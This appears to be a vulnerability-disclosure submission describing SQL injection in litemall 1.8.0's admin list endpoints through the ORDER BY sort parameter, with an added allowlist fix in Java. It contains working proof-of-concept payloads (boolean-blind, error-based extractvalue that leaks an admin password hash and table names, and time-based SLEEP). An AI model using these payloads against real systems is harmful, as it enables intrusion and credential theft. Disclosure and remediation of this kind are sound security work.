Submission #811468: linlinjava litemall up to 1.8.0 SQL Injection

Information

Title: linlinjava litemall up to 1.8.0 SQL Injection
Description: A vulnerability was found in linlinjava litemall up to 1.8.0 (https://github.com/linlinjava/litemall). It has been rated as critical. This issue affects multiple admin controller list endpoints that are NOT covered by existing CVEs (CVE-2024-24323 covers AdminOrderController only, CVE-2024-46382 covers AdminGoodsController only).

Affected endpoints:
- AdminAftersaleController (/admin/aftersale/list)
- AdminCommentController (/admin/comment/list)
- AdminFeedbackController (/admin/feedback/list)
- AdminTopicController (/admin/topic/list)
- AdminAdController (/admin/ad/list)
- AdminCouponController (/admin/coupon/list)
- AdminUserController (/admin/user/list)
- AdminStorageController (/admin/storage/list)

All 37 MyBatis Mapper XML files use ${orderByClause} for dynamic ORDER BY:

    <if test="orderByClause != null">order by ${orderByClause}</if>

The sort/order HTTP parameters are concatenated in Service classes:

    example.setOrderByClause(sort + " " + order);

PoC 1 - Boolean-based blind (verified on MySQL 8.0.45 with a real litemall database):

    GET /admin/aftersale/list?sort=IF(1=1,id,name)&order=asc -> sorted by id (first row id=1006002)
    GET /admin/aftersale/list?sort=IF(1=2,id,name)&order=asc -> sorted by name (first row id=1025005)

Different results confirm injection.

PoC 2 - Error-based extractvalue:

    sort=extractvalue(1,concat(0x7e,version(),0x7e)) -> Error: XPATH syntax error: '~8.0.45~' (version leaked)
    sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e)) -> Error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' (admin password hash leaked)
    sort=extractvalue(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e)) -> All table names leaked

PoC 3 - Time-based blind:

    sort=IF(SUBSTRING(user(),1,1)='r',SLEEP(2),1) -> Response delayed ~8 minutes (confirms user starts with 'r')

Reporter: berna ([email protected])
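The root cause described above is that the sort and order request parameters reach ${orderByClause} unchanged. The following is an added example (not litemall's own code) showing that concatenation beside an allowlist check that keeps only known column names and directions; the column names and class name are illustrative assumptions.

```java
import java.util.Set;

/**
 * Added example, not part of the submission or of litemall: the ORDER BY
 * concatenation pattern described in the report, beside a hardened variant.
 * Column names below are assumptions for an illustrative list endpoint.
 */
public class SortParamValidation {

    // Identifiers this hypothetical list endpoint is permitted to sort on.
    private static final Set<String> ALLOWED_SORT = Set.of("id", "add_time", "update_time");
    private static final Set<String> ALLOWED_ORDER = Set.of("asc", "desc");

    /** Vulnerable: request parameters are concatenated into the ORDER BY string unchanged. */
    public static String vulnerableOrderBy(String sort, String order) {
        return sort + " " + order;   // becomes "order by ${orderByClause}" in the mapper XML
    }

    /**
     * Hardened: only allowlisted identifiers reach the SQL string; any other value
     * is rejected before it can be substituted by ${orderByClause}.
     * Returning null lets <if test="orderByClause != null"> emit no ORDER BY at all.
     */
    public static String safeOrderBy(String sort, String order) {
        if (sort == null || order == null) {
            return null;
        }
        String column = sort.trim();
        String direction = order.trim().toLowerCase();
        if (!ALLOWED_SORT.contains(column) || !ALLOWED_ORDER.contains(direction)) {
            throw new IllegalArgumentException("invalid sort/order parameter");
        }
        return column + " " + direction;
    }

    public static void main(String[] args) {
        System.out.println(safeOrderBy("add_time", "DESC"));   // add_time desc
        try {
            safeOrderBy("IF(1=1,id,name)", "asc");             // expression is not a column name
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Rejecting, rather than stripping, unexpected values also gives a clean log line to alert on when a list endpoint receives a sort parameter that is not a plain column name.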
Source: https://gist.github.com/A1AAAAAAAAAA1/bc875f5be52b44b2e557c5312e355d47
User: berna (UID 97558)
Submitted: 23/04/2026 04:41 PM (1 month ago)
Moderation: 17/05/2026 11:36 AM (24 days later)
Status: Approved
VulDB Entry: 364397 [linlinjava litemall up to 1.8.0 Admin Endpoint SQL Injection]
Points: 20
